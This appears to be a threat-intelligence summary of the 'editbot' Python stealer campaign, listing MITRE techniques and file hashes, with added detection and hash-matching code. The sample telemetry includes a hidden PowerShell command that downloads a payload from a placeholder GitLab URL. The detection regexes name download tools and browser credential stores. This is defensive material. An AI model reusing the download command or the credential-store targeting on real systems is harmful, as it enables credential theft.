Cyble researchers uncovered a multi-stage social-media scam campaign that culminates in a Windows-based Python stealer named editbot, with payloads fetched from open-source platforms. The attacker flow includes persistence, staged downloads, and exfiltration of browser data via Telegram, targeting social-media users and their browsers. #editbot #Cyble #CRIL #GitLab #Telegram
Keypoints
- CRIL found a minimally detectable WinRAR archive on VirusTotal linked to a campaign targeting Social Media users.
- The campaign employs a multi-stage infection chain with distinct roles (evasion, payload download, persistence).
- Threat actors retrieve the next-stage payloads from open-source platforms like GitLab.
- The downloaded payload is a Python-based stealer named “editbot” that steals passwords, cookies, web data, and other details, exfiltrating via a Telegram bot.
- The first-stage BAT file uses PowerShell to download and drop further components, including a Startup-located BAT for persistence.
- The attack chain culminates in collecting browser data (Chrome, Firefox, Edge, Chromium-based) and sending it to attackers via Telegram.
MITRE Techniques
- [T1566] Phishing – Reach users via phishing sites. ‘This stealer could reach users via phishing sites.’
- [T1059.001] PowerShell – Used to download and execute the stealer. ‘PowerShell commands are used to perform various download activities in the system.’
- [T1057] Process Discovery – Enumerates running processes. ‘The stealer captures all the running process.’
- [T1547.001] Startup Folder – Persistence by placing items in the startup folder. ‘The BAT file “WindowsSecure.bat” serves the purpose of ensuring persistence. It is designed to execute the Python stealer that will be downloaded at a later stage, specifically located at “C:\Users\Public\Document\libb1.py” every time the system starts.’
- [T1005] Data from Local System – Collects sensitive data from the victim’s system. ‘The final payload is a Windows-specific Python-based stealer designed to collect various sensitive information, such as passwords, cookies, web data, active system processes, etc.’
- [T1539] Steal Web Session Cookie – Extracts cookies from browsers. ‘The stealer connects to the SQLite database file named “Cookies,” which contains cookie information from various web browsers.’
- [T1555] Credentials from Password Stores – Decrypts passwords from browser stores. ‘decrypts the passwords, and saves the URL, username, and decrypted password into a newly created text file named “pass.txt.”’
- [T1567] Exfiltration Over Web Service – Transfers data via a web service. ‘Uses Telegram channel to exfiltrate data’
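The keypoints and the technique list above describe one chain: a cmd-launched PowerShell download into C:\Users\Public, a BAT dropped into the Startup folder, a Python process reading browser cookie and credential stores, and an outbound connection to the Telegram Bot API. The following detector, an added example written here and not code from Cyble or from the stealer, turns that chain into four per-event rules and correlates them per host over constructed Sysmon-style telemetry. Hostnames, user names, the python.exe location and the GitLab URL in the sample events are placeholders; the Startup path, the C:\Users\Public\Document\libb1.py path and the api.telegram.org host are taken from the report.

```python
import re
from collections import defaultdict

# Constructed, Sysmon-style telemetry for two hosts. Hostnames, user names, the
# python.exe location and the GitLab URL are placeholders, not values from the report.
EVENTS = [
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": "explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\Downloads\Screenshot Product Photo Sample.bat"'},
    {"host": "ws01", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": "cmd.exe",
     "cmdline": r'powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri '
                r'https://gitlab.com/PLACEHOLDER/raw/libb1.py -OutFile C:\Users\Public\Document\libb1.py"'},
    {"host": "ws01", "type": "file_create", "image": r"C:\Windows\System32\cmd.exe",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat"},
    {"host": "ws01", "type": "file_read", "image": r"C:\Users\Public\Document\python.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"host": "ws01", "type": "file_read", "image": r"C:\Users\Public\Document\python.exe",
     "path": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"host": "ws01", "type": "network", "image": r"C:\Users\Public\Document\python.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    # Benign activity on a second host: the browser reading its own cookie store and
    # an interactive PowerShell session with no download cradle.
    {"host": "ws02", "type": "file_read",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"host": "ws02", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": "explorer.exe", "cmdline": "powershell Get-Service"},
]

DOWNLOAD_CRADLE = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|\bcurl\b|\bwget\b", re.I)
PUBLIC_DIR = re.compile(r"C:\\Users\\Public\\", re.I)
STARTUP_BAT = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.bat$", re.I)
# Chromium-family stores live under "User Data"; Firefox keeps cookies.sqlite/logins.json under "Profiles".
BROWSER_STORE = re.compile(
    r"(\\User Data\\.*\\(Cookies|Login Data|Web Data)|\\Profiles\\.*\\(cookies\.sqlite|logins\.json))$", re.I)
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "chromium.exe", "brave.exe", "opera.exe"}


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_powershell_download(ev):
    """T1059.001: cmd-spawned PowerShell that fetches content into C:\\Users\\Public."""
    if ev["type"] != "process" or image_name(ev["image"]) != "powershell.exe":
        return None
    if ev.get("parent", "").lower() != "cmd.exe":
        return None
    cmd = ev.get("cmdline", "")
    return "T1059.001" if DOWNLOAD_CRADLE.search(cmd) and PUBLIC_DIR.search(cmd) else None


def rule_startup_bat(ev):
    """T1547.001: a .bat written into a user's or the common Startup folder."""
    if ev["type"] == "file_create" and STARTUP_BAT.search(ev["path"]):
        return "T1547.001"
    return None


def rule_browser_store(ev):
    """T1539 / T1555: a process other than the browser itself reading cookie or credential stores."""
    if ev["type"] != "file_read" or image_name(ev["image"]) in BROWSER_IMAGES:
        return None
    if not BROWSER_STORE.search(ev["path"]):
        return None
    return "T1539" if ev["path"].lower().endswith(("cookies", "cookies.sqlite")) else "T1555"


def rule_telegram_exfil(ev):
    """T1567: a non-browser process talking to the Telegram Bot API host."""
    if (ev["type"] == "network" and ev.get("dest_host", "").lower().endswith("api.telegram.org")
            and image_name(ev["image"]) not in BROWSER_IMAGES):
        return "T1567"
    return None


RULES = (rule_powershell_download, rule_startup_bat, rule_browser_store, rule_telegram_exfil)


def correlate(events):
    """Map each host to the sorted list of distinct chain stages observed on it."""
    hits = defaultdict(set)
    for ev in events:
        for rule in RULES:
            tid = rule(ev)
            if tid:
                hits[ev["host"]].add(tid)
    return {host: sorted(t) for host, t in hits.items()}


def chain_hosts(events, min_stages=3):
    """Hosts on which enough distinct stages line up to treat the activity as the full chain."""
    return sorted(h for h, t in correlate(events).items() if len(t) >= min_stages)


if __name__ == "__main__":
    for host, techniques in correlate(EVENTS).items():
        print(host, techniques)
    print("chain hosts:", chain_hosts(EVENTS))
```

Each rule on its own is noisy (administrators do run PowerShell downloads, and backup agents do touch browser profile directories); the value is in the per-host correlation, which is why `chain_hosts` requires several distinct stages before it names a host.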
Indicators of Compromise
- [File Hash] Screenshot-Product-Photo-Sample_25929.rar – fd8391a1a0115880e8c3ee2e76fbce741f1b3c5fbcb728b9fac37c21e9f6d7b7, feff390b99dfe7619a20748582279bc13c04f52a, and 1 more hash
- [File Hash] Screenshot Product Photo Sample.bat – d13aba752f86757de6628e833f4fdf4c625f480056e93b919172e9c309448b80, 18e96d94089086848a0569a1e1d8051da0f6f444, and 1 more hash
- [File Hash] Python stealer (libb1.py) – 3f7bd47fbbf1fb0a63ba955c8f9139d6500b6737e5baf5fdb783f0cedae94d6d, eed59a282588778ffbc772085b03d229a5d99e35, and 1 more hash
- [File Hash] product-_img_2023-12_86-13a30f_13373.rar – 9d048e99bed4ced4f37d91a29763257a1592adb2bc8e17a66fa07a922a0537d0, 93d70f02b2ee2c4c2cd8262011ed21317c7d92de, and 1 more hash
- [File Hash] image – photo_product _2023-12_86-13a30ff503fd6638c5863dta.bat – bc3993769a5f82e454acef92dc2362c43bf7d6b6b203db7db8803faa996229aa, cf019e96e16fdaa504b29075aded36be27691956, and 1 more hash
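The indicator lines above follow a fixed shape (name, SHA-256, SHA-1, then an elided third hash). As an added example, not code from Cyble, the block below parses that shape into a lookup table keyed by both digests, validates the hex lengths, and checks arbitrary file bytes against it. The five indicator lines are copied from this summary; the bytes in the usage call are constructed and are not expected to match anything.

```python
import hashlib
import re

# The five IoC lines exactly as they appear in the summary. The "and 1 more hash" tail is
# elided on the page, so only the SHA-256 and SHA-1 values are parsed.
IOC_LINES = """\
- [File Hash] Screenshot-Product-Photo-Sample_25929.rar – fd8391a1a0115880e8c3ee2e76fbce741f1b3c5fbcb728b9fac37c21e9f6d7b7, feff390b99dfe7619a20748582279bc13c04f52a, and 1 more hash
- [File Hash] Screenshot Product Photo Sample.bat – d13aba752f86757de6628e833f4fdf4c625f480056e93b919172e9c309448b80, 18e96d94089086848a0569a1e1d8051da0f6f444, and 1 more hash
- [File Hash] Python stealer (libb1.py) – 3f7bd47fbbf1fb0a63ba955c8f9139d6500b6737e5baf5fdb783f0cedae94d6d, eed59a282588778ffbc772085b03d229a5d99e35, and 1 more hash
- [File Hash] product-_img_2023-12_86-13a30f_13373.rar – 9d048e99bed4ced4f37d91a29763257a1592adb2bc8e17a66fa07a922a0537d0, 93d70f02b2ee2c4c2cd8262011ed21317c7d92de, and 1 more hash
- [File Hash] image – photo_product _2023-12_86-13a30ff503fd6638c5863dta.bat – bc3993769a5f82e454acef92dc2362c43bf7d6b6b203db7db8803faa996229aa, cf019e96e16fdaa504b29075aded36be27691956, and 1 more hash
"""

# The name is matched non-greedily and the digests by exact hex length, so a name that
# itself contains " – " (the last line) still splits at the right place.
IOC_RE = re.compile(
    r"^- \[File Hash\] (?P<name>.+?) – (?P<sha256>[0-9a-fA-F]{64}), (?P<sha1>[0-9a-fA-F]{40})")


def parse_ioc_lines(text):
    """Return a dict keyed by lowercase SHA-256 and SHA-1, each pointing at the same record."""
    table = {}
    for line in text.splitlines():
        m = IOC_RE.match(line.strip())
        if not m:
            continue  # skip headings or lines that do not carry two well-formed digests
        rec = {"name": m["name"].strip(), "sha256": m["sha256"].lower(), "sha1": m["sha1"].lower()}
        table[rec["sha256"]] = rec
        table[rec["sha1"]] = rec
    return table


def distinct_records(table):
    """Collapse the double-keyed table back to one record per indicator."""
    return {r["sha256"]: r for r in table.values()}


def hash_bytes(data):
    """SHA-256 and SHA-1 hex digests of a file's bytes."""
    return hashlib.sha256(data).hexdigest(), hashlib.sha1(data).hexdigest()


def lookup(table, digest):
    """Find an indicator by either digest, tolerant of case and surrounding whitespace."""
    return table.get(digest.strip().lower())


def match_bytes(table, data):
    """Hash file content and return the matching indicator record, or None."""
    sha256, sha1 = hash_bytes(data)
    return lookup(table, sha256) or lookup(table, sha1)


if __name__ == "__main__":
    table = parse_ioc_lines(IOC_LINES)
    print(len(distinct_records(table)), "indicators loaded")
    # Constructed bytes, not a sample from the campaign: expected to match nothing.
    print(match_bytes(table, b"constructed benign content"))
```

Keying the table by both digests lets a single lookup serve telemetry sources that report only SHA-1 as well as those that report SHA-256; extend `IOC_RE` with a third group if the elided hash becomes available.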
Read more: https://cyble.com/blog/new-editbot-stealer-spreads-via-social-media-messages/